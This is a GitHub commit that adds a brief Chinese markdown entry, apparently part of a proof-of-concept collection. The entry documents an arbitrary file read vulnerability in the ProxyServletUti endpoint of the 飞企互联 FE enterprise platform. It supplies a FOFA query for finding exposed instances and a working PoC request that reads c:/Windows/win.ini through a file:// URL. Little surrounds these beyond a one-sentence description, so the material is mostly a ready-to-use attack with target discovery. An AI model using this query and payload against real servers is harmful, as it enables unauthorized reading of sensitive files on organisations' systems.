Create 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md

wy876 · Apr 27, 2024 · 2857cb0 · 2857cb0
1 parent c8c687d
commit 2857cb0
Showing 1 changed file with 15 additions and 0 deletions.
diff --git a/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md b/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md
@@ -0,0 +1,15 @@
+## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
+
+飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求，读取服务器上的敏感文件。
+
+
+
+## fofa
+```
+app="飞企互联-FE企业运营管理平台"
+```
+
+## poc
+```
+/ProxyServletUtil?url=file:///c:/Windows/win.ini
+```